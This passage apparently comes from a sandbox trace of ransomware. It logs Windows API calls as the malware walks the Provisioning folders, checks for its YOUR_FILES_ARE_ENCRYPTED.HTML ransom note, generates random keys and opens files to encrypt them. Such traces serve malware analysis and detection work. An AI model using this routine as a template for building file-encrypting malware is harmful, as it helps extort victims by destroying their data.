users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.022] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.022] CloseHandle (hObject=0x30c) returned 1 [0110.022] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.022] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.022] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned 89 [0110.022] GetProcessHeap () returned 0x600000 [0110.022] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.023] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" [0110.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*" [0110.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaebc9f06, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.023] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaebc9f06, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.023] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.023] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.023] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned 97 [0110.023] GetProcessHeap () returned 0x600000 [0110.023] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.024] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime" [0110.024] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*" [0110.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaebc0204, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f479c, dwReserved1=0x6f46e8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaebc0204, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f479c, dwReserved1=0x6f46e8, cFileName="..", cAlternateFileName="")) returned 1 [0110.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x6f479c, dwReserved1=0x6f46e8, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.024] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.024] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.024] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.024] lstrlenW (lpString=".provxml") returned 8 [0110.024] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x6f479c, dwReserved1=0x6f46e8, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.024] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.024] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.024] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.024] lstrlenW (lpString=".provxml") returned 8 [0110.024] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaebbc7a1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaebbc7a1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebc3d85, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f479c, dwReserved1=0x6f46e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaebbc7a1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaebbc7a1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebc3d85, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f479c, dwReserved1=0x6f46e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.025] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.025] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.025] GetProcessHeap () returned 0x600000 [0110.025] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.025] GetProcessHeap () returned 0x600000 [0110.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.025] GetProcessHeap () returned 0x600000 [0110.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.026] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x157, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.026] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.026] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml") returned 101 [0110.026] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.026] lstrlenW (lpString=".xml") returned 4 [0110.026] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.026] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.026] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=343) returned 1 [0110.026] CloseHandle (hObject=0x32c) returned 1 [0110.026] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaebc9f06, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaebc9f06, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebcd9c1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.026] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaebc9f06, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaebc9f06, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebcd9c1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.026] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.027] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.027] GetProcessHeap () returned 0x600000 [0110.027] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.027] GetProcessHeap () returned 0x600000 [0110.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.027] GetProcessHeap () returned 0x600000 [0110.027] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.028] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaebd138e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaebd138e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebd4e0e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.028] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaebd138e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaebd138e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebd4e0e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.028] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.028] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.028] GetProcessHeap () returned 0x600000 [0110.028] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.029] GetProcessHeap () returned 0x600000 [0110.029] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.029] GetProcessHeap () returned 0x600000 [0110.029] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.029] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaebfed8f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebfed8f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{23cb517f-5073-4e96-a202-7fe6122a2271}", cAlternateFileName="{23CB5~1")) returned 1 [0110.029] StrStrIW (lpFirst="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.029] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned 84 [0110.029] GetProcessHeap () returned 0x600000 [0110.029] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.030] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" [0110.030] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*" [0110.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaebfed8f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec24c65, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.030] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaebfed8f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec24c65, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.031] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa15d3ecf, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa15d3ecf, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaec030c8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x159d, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F", cAlternateFileName="CUSTOM~1.393")) returned 1 [0110.031] StrStrIW (lpFirst="customizations.xml.3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.031] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F") returned 168 [0110.031] PathFindExtensionW (pszPath="customizations.xml.3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F") returned=".3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F" [0110.031] lstrlenW (lpString=".3937F94E11B3568AEC37EDCBCDE859201BA8FA9123D01DC11B499EF133DE3F3F") returned 65 [0110.031] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1430407, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1430407, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1430407, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.031] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.031] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml") returned 104 [0110.031] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.031] lstrlenW (lpString=".xml") returned 4 [0110.031] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.031] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.031] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.031] CloseHandle (hObject=0x30c) returned 1 [0110.031] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.031] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.031] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned 89 [0110.031] GetProcessHeap () returned 0x600000 [0110.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.032] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") 